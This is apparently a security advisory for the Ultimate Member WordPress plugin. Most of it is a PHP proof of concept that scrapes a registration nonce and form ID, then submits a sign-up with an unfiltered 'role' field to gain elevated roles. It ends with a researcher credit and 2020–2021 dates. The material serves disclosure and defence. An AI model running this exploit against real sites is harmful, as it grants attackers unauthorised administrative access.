Because the role parameter submitted during the registration process was not filtered, an attacker could set it to a WordPress capability or to any custom Ultimate Member role and effectively be granted the corresponding privileges.
<?php
/*
 * Proof of concept accompanying the advisory above: it drives the Ultimate Member
 * registration form and adds a client-chosen `role` field to the submitted POST.
 * Apart from that extra `role` key the request is an ordinary sign-up; that key is
 * the parameter the advisory describes as accepted unfiltered, so the server-side
 * fix is to ignore or allow-list it, and a registration POST carrying `role` is the
 * field a WAF rule or request inspection would key on.
 *
 * Positional command-line arguments:
 *   1 site base URL   2 username   3 first name   4 last name   5 e-mail address
 *   6 value sent as `role`
 */

// Settings: every input is taken straight from argv, with no validation.
$wp_url = $argv[1];
$username = $argv[2];
$name = $argv[3];
$lastname = $argv[4];
$email = $argv[5];
$um_role = $argv[6];

// Pull the nonce: GET the registration page (following redirects) and scrape the
// `_wpnonce` hidden field. The regex assumes the rendered markup has the attribute
// order `_wpnonce" value="..."` — TODO confirm against the plugin's form template.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches);
$nonce = $matches[1];

// Pull the form_id: the same page is fetched a second time (the $content from the
// first request already contains this form) and the suffix of `form_id_…` is scraped.
// The form_id is what Ultimate Member uses to namespace the field names posted below.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
preg_match('/id=\"form_id_([^"]+)"/', $content, $matches);
$form_id = $matches[1];

// Submit the registration (the original label "Update Settings" is misleading):
// POST the regular form fields, each suffixed with the scraped form_id, plus the
// unsuffixed `role` key taken from argv. The password is a fixed literal and the
// `timestamp` value is hard-coded rather than read from the page.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'user_login-' . $form_id => $username,
    'first_name-'. $form_id => $name,
    'last_name-' . $form_id => $lastname,
    'user_email-' . $form_id => $email,
    'user_password-' . $form_id => 'StrongPassword123!',
    'confirm_user_password-' . $form_id => 'StrongPassword123!',
    'role' => $um_role, // the unfiltered parameter the advisory is about
    'form_id' => $form_id,
    'timestamp' => '1603399250',
    'um_request' => '',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => 'register'
]);
$output = curl_exec($ch);
curl_close($ch);

// Dump the raw response body; the script does not interpret it.
print_r($output);
?>
Chloe Chamberland
Chloe Chamberland
No
2020-11-09 (about 2 years ago)
2020-11-09 (about 2 years ago)
2021-01-09 (about 2 years ago)